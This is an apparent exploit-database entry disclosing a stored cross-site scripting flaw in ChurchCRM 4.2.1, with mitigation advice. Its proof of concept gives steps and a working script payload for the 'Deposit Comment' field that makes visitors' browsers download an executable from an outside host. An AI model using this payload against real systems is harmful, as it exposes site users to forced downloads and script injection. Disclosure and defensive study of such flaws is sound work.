ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)

vendor:

ChurchCRM

by:

Mufaddal Masalawala

8.8

CVSS

HIGH

Persistent Cross Site Scripting (XSS)

CWE

Product Name: ChurchCRM

Affected Version From: 4.2.1

Affected Version To: 4.2.1

Patch Exists: No

Related CWE: N/A

CPE: a:churchcrm:churchcrm:4.2.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux 2020.3

2020

ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)

ChurchCRM application allows stored XSS, via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. An attacker can inject malicious JavaScript code in the 'Deposit Comment' field and when a user visits the 'View All Deposits' page, the malicious code will be executed.

Mitigation:

Validate user input and escape special characters, Implement a Content Security Policy (CSP), Use a web application firewall

Source

Exploit-DB raw data:

#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:

   1. Login to the application, go to 'View all Deposits' module.
   2. Add the payload ( <script>var link = document.createElement('a');
   link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
   link.download = ''; document.body.appendChild(link); link.click();
</script>
   ) in the 'Deposit Comment' field and click "Add New Deposit".
   3. Payload is executed and a .exe file is downloaded.